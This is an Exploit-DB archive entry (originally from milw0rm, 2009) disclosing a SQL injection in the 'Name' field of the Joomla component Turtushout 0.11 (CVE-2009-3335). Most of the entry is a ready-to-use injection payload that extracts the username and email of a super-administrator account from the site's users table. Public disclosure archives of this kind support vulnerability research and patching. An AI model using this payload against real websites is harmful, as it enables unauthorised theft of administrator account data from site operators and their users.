Joomla Component Turtushout 0.11 Name SQL Injection Vulnerability

2009-09-14T00:00:00
ID EDB-ID:9653
Type exploitdb
Reporter jdc
Modified 2009-09-14T00:00:00

Description

Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability. CVE-2009-3335. Webapps exploit for php platform

                                        
                                            Joomla Component Turtushout 0.11SQL Injection

'Name' field SQL injection:

test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '

jdc 2009 

# milw0rm.com [2009-09-14]